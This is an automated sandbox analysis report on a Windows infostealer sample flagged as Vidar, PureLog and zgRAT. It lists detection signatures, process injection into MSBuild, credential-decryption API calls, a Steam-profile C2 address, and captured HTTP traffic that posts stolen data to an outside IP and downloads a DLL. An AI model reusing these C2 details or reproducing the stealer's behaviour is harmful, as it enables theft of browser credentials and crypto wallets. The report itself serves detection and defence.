Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
YyIDUCFWC1.exe

Overview

General Information

Sample name:YyIDUCFWC1.exe
renamed because original name is a hash value
Original sample name:6d59b75f2b8bf7590c144cd4b3d24516.exe
Analysis ID:1427891
MD5:6d59b75f2b8bf7590c144cd4b3d24516
SHA1:6325d9ea89692248cf599493743f637b7fefe726
SHA256:50ccd3682708ff0e7a6bfe46730937d469ca29e0ae405f3607b70fb15ad2e5c0
Tags:exezgRAT
Infos:

Detection

PureLog Stealer, Vidar, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected Vidar
Yara detected Vidar stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Searches for specific processes (likely to inject)
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • YyIDUCFWC1.exe (PID: 5480 cmdline: "C:\Users\user\Desktop\YyIDUCFWC1.exe" MD5: 6D59B75F2B8BF7590C144CD4B3D24516)
    • MSBuild.exe (PID: 6360 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199673019888"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
YyIDUCFWC1.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    YyIDUCFWC1.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      YyIDUCFWC1.exeMALWARE_Win_zgRATDetects zgRATditekSHen
      • 0x1350cb:$s1: file:///
      • 0x134fdb:$s2: {11111-22222-10009-11112}
      • 0x13505b:$s3: {11111-22222-50001-00000}
      • 0x133e13:$s4: get_Module
      • 0x35d3b6:$s4: get_Module
      • 0x1341ab:$s5: Reverse
      • 0x35beb7:$s5: Reverse
      • 0x40b6a1:$s5: Reverse
      • 0x35c023:$s6: BlockCopy
      • 0x117bba:$s7: ReadByte
      • 0x350c6e:$s7: ReadByte
      • 0x40be07:$s7: ReadByte
      • 0x1350dd:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...

      PCAP (Network Traffic)

      SourceRuleDescriptionAuthorStrings
      sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000000.00000002.1701548677.0000000003DA5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          00000000.00000002.1701132649.0000000002E75000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              00000000.00000002.1701548677.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                00000000.00000002.1709833273.0000000005CC0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  Click to see the 8 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  1.2.MSBuild.exe.400000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                    0.2.YyIDUCFWC1.exe.3e0c1e0.7.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                      0.2.YyIDUCFWC1.exe.3e3f810.8.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                        0.2.YyIDUCFWC1.exe.3e3f810.8.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                          0.2.YyIDUCFWC1.exe.3e0c1e0.7.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                            Click to see the 4 entries

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: Silenttrinity Stager Msbuild Activity
                            Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 23.4.32.216, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 6360, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49732

                            Snort Signatures

                            No Snort rule has matched

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Found malware configuration
                            Source: 00000000.00000002.1701548677.0000000003DA5000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199673019888"]}
                            Multi AV Scanner detection for submitted file
                            Source: YyIDUCFWC1.exeReversingLabs: Detection: 26%
                            Source: YyIDUCFWC1.exeVirustotal: Detection: 26%Perma Link
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF2DD20 CryptReleaseContext,0_2_6CF2DD20
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF2DEE0 CryptReleaseContext,0_2_6CF2DEE0
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF2DE00 CryptGenRandom,__CxxThrowException@8,0_2_6CF2DE00
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF2D9D0 CryptAcquireContextA,GetLastError,0_2_6CF2D9D0
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF2DBB0 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__CxxThrowException@8,0_2_6CF2DBB0
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF535E0 CryptReleaseContext,0_2_6CF535E0
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF2D7F0 CryptReleaseContext,0_2_6CF2D7F0
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF2D7D3 CryptReleaseContext,0_2_6CF2D7D3
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00406FD0 CryptUnprotectData,LocalAlloc,LocalFree,1_2_00406FD0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00409230 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,PK11_FreeSlot,lstrcat,PK11_FreeSlot,lstrcat,1_2_00409230
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00411720 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,1_2_00411720
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00406F50 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_00406F50
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB5A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,1_2_6CB5A9A0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB544C0 PK11_PubEncrypt,1_2_6CB544C0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB24420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,1_2_6CB24420
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB54440 PK11_PrivDecrypt,1_2_6CB54440
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBA25B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,1_2_6CBA25B0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB3E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,1_2_6CB3E6E0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB38670 PK11_ExportEncryptedPrivKeyInfo,1_2_6CB38670
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB5A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,1_2_6CB5A650
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB7A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,1_2_6CB7A730
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB80180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,1_2_6CB80180
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB543B0 PK11_PubEncryptPKCS1,PR_SetError,1_2_6CB543B0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB77C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,1_2_6CB77C00
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB7BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,1_2_6CB7BD30
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB37D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,1_2_6CB37D60
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB79EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,1_2_6CB79EC0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB53FF0 PK11_PrivDecryptPKCS1,1_2_6CB53FF0
                            Source: YyIDUCFWC1.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                            Source: unknownHTTPS traffic detected: 23.4.32.216:443 -> 192.168.2.4:49732 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 65.109.242.73:443 -> 192.168.2.4:49733 version: TLS 1.2
                            Source: YyIDUCFWC1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: mozglue.pdbP source: MSBuild.exe, 00000001.00000002.2111715611.000000006CF6D000.00000002.00000001.01000000.0000000B.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
                            Source: Binary string: freebl3.pdb source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                            Source: Binary string: freebl3.pdbp source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                            Source: Binary string: nss3.pdb@ source: MSBuild.exe, 00000001.00000002.2110913060.000000006CC2F000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
                            Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: YyIDUCFWC1.exe, 00000000.00000002.1701548677.000000000449D000.00000004.00000800.00020000.00000000.sdmp, YyIDUCFWC1.exe, 00000000.00000002.1701548677.0000000004312000.00000004.00000800.00020000.00000000.sdmp, YyIDUCFWC1.exe, 00000000.00000002.1708250819.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, YyIDUCFWC1.exe, 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmp, Protect544cd51a.dll.0.dr
                            Source: Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.2015\Release\System.Data.SQLite.pdb source: YyIDUCFWC1.exe
                            Source: Binary string: C:\Users\sc-client\Jenkins\workspace\WindowsBuild\SecureConnectClient\ACVC.Core\obj\WinRelease\netstandard2.0\AWSVPNClient.Core.pdbSHA256 source: YyIDUCFWC1.exe
                            Source: Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.2015\Release\System.Data.SQLite.pdb\ source: YyIDUCFWC1.exe
                            Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
                            Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
                            Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
                            Source: Binary string: C:\Users\sc-client\Jenkins\workspace\WindowsBuild\SecureConnectClient\ACVC.Core\obj\WinRelease\netstandard2.0\AWSVPNClient.Core.pdb source: YyIDUCFWC1.exe
                            Source: Binary string: nss3.pdb source: MSBuild.exe, 00000001.00000002.2110913060.000000006CC2F000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
                            Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000001.00000002.2105558542.0000000019808000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2099739476.0000000013898000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.dr
                            Source: Binary string: mozglue.pdb source: MSBuild.exe, 00000001.00000002.2111715611.000000006CF6D000.00000002.00000001.01000000.0000000B.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
                            Source: Binary string: softokn3.pdb source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
                            Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: YyIDUCFWC1.exe, 00000000.00000002.1708250819.000000000577A000.00000004.08000000.00040000.00000000.sdmp, YyIDUCFWC1.exe, 00000000.00000002.1701548677.00000000043CE000.00000004.00000800.00020000.00000000.sdmp, YyIDUCFWC1.exe, 00000000.00000002.1701548677.0000000004243000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: c:\Temp\Json\Working\Newtonsoft.Json\Src\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb source: YyIDUCFWC1.exe
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040B030 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_0040B030
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004011E0 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_004011E0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040D320 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040D320
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004164A0 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,wsprintfA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,DeleteFileA,FindNextFileA,FindClose,1_2_004164A0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00417550 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00417550
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040A530 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0040A530
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00416CF0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00416CF0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00417140 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,1_2_00417140
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040A980 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040A980
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004168E0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,1_2_004168E0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h0_2_05323AD8
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 4x nop then jmp 0532BD0Ah0_2_0532BC50
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 4x nop then jmp 0532BD0Ah0_2_0532BC58
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h0_2_05323CF1
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h0_2_05323CF8
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_053207B4
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h0_2_05323E00
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h0_2_05323E08
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_053226EC
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_0532C120
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_0532C119
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h0_2_05323BE0
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h0_2_05323BE8
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h0_2_05323AD2

                            Networking

                            barindex
                            C2 URLs / IPs found in malware configuration
                            Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199673019888
                            Source: global trafficHTTP traffic detected: GET /profiles/76561199673019888 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                            Source: Joe Sandbox ViewIP Address: 23.4.32.216 23.4.32.216
                            Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IIDHJKFBGIIJJKFIJDBGUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKKFBGDHJKFHJJJJDGCUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDAFIJJECFHJJKFCAKJUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHJJEHIEBKKFIDHDGHJUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 6973Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIDBKKKKKFBGDGDHIDBGUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
